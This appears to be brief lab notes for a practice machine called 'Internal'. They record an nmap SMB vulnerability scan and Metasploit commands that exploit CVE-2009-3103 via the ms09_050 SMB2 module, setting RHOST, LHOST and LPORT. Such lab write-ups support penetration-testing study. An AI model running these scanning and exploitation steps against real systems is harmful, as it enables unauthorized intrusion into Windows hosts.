Internal (easy)

[WDavid404]

Key points:

nmap -script smb-vuln* -p 139,445 -oN smb-vuln-scan $IP --> get more correct info than autoscan..

[WDavid404]

According to autoscan's tcp_139_smb_nmap, --> CVE-2017-0143 exit But it didn:t work

However, if we do nmap -script smb-vuln* -p 139,445 -oN smb-vuln-scan 192.168.237.40 ---> we get CVE-2009-3103

msfconsole
search CVE-2009-3103
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
show options
set RHOST, LHOST, LPORT ...
run